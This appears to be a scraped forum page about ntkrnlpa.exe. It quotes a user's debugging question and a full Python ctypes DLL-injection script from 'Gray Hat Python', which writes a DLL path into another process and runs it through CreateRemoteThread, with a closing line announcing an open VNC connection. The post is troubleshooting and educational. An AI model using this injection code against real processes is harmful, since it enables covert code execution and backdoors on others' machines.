» An ultimate catalog of computer data
Forum posts for ntkrnlpa.exe
Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…
i am trying with the following task:
1. inject a dll to a process;
2. use the windll.kernel32.CreateRemoteThread() within the mode of ctypes of python;
And i am encouting the following results:
1. the new thread is created success; but
2. I can not grap this thread via windbg;
3. the call stack (grapped via processExploer) is strange:
ntkrnlpa.exe!KiUnexpectedInterrupt+0x8d
ntkrnlpa.exe!PsDereferencePrimaryToken+0x362
ntkrnlpa.exe!KiDeliverApc+0xb3
ntkrnlpa.exe!ZwYieldExecution+0x19a4
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x29b56
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2ac2b
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2b20b
ntkrnlpa.exe!PsRemoveCreateThreadNotifyRoutine+0x11d
ntkrnlpa.exe!KiDispatchInterrupt+0x5a2
kernel32.dll!CreateThread+0x22
The code is from 'gray hat python', and it's like this:
import sys
from ctypes import *
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]
dll_len = len(dll_path)
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )
if not h_process:
print '[*] Couldn't acquire a handle to PID: %s' % pid
sys.exit(0)
# Allocate some space for the DLL path
arg_address = kernel32.VirtualAllocEx( h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)
# Write the DLL path into the allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))
# We need to resolve the address for LoadLibraryA
h_kernel32 = kernel32.GetModuleHandleA('kernel32.dll')
h_loadlib = kernel32.GetProcAddress(h_kernel32,'LoadLibraryA')
# Now we try to create the remote thread, with the entry point set
# to LoadLibraryA and a pointer to the DLL path as it's single parameter
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,h_loadlib,arg_address,0,byref(thread_id)):
print '[*] Failed to inject the DLL. Exiting.'
sys.exit(0)
print '[*] Remote thread successfully created with a thread ID of: 0x%08x' % thread_id.value
print '[*] VNC Connection now open and ready for action....'
View complete forum thread with replies
Other posts related to ntkrnlpa.exe
See Related Forum Messages: Follow the Links Below to View Complete Thread
NTOSKRNL.EXE vs NTKRNLMP.EXE vs NTKRNLPA.EXE vs NTKRPAMP.EXE [closed]
Windows service and continuous memory alloc
Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…
Unusual high cpu utilization in ntkrnlpa:FsRtlAreNamesEqual and ntkrnlpa:RtlUpcaseUnicodeString
IE hanging with 100% CPU / Got stack trace
WinDbg lmv command not working
Windbg “Processes and Threads” window doesn't change context when kernel debugging
VB.Net 2008 IDE hanging - MSVB7.dll eating 100% CPU when editing code
.NET AppDomain.Unload triggers runaway threads
VB.NET Program Locks Up with Internet Explorer Opened